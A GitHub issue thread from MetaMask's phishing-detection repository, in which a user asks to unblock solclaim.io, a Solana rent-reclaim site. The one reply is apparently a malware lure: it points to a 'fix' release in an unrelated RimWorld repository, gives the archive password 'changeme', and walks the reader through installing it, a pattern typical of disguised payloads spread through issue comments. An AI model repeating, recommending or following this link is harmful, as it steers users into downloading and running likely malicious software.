### ISSUE TITLE
[Unblock Legitimate Site]

### ISSUE THREAD

**Issue by cyrptstacher** [MetaMask/eth-phishing-detect#79361]
**solclaim.io, app.solclaim.io**

SolClaim helps people close their token accounts and claim back rent fees on SOL, it doesnt even support metamask...

- [ ] I have checked to make sure that [there is not a duplicate issue](https://github.com/MetaMask/eth-phishing-detect/issues)
Yes

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
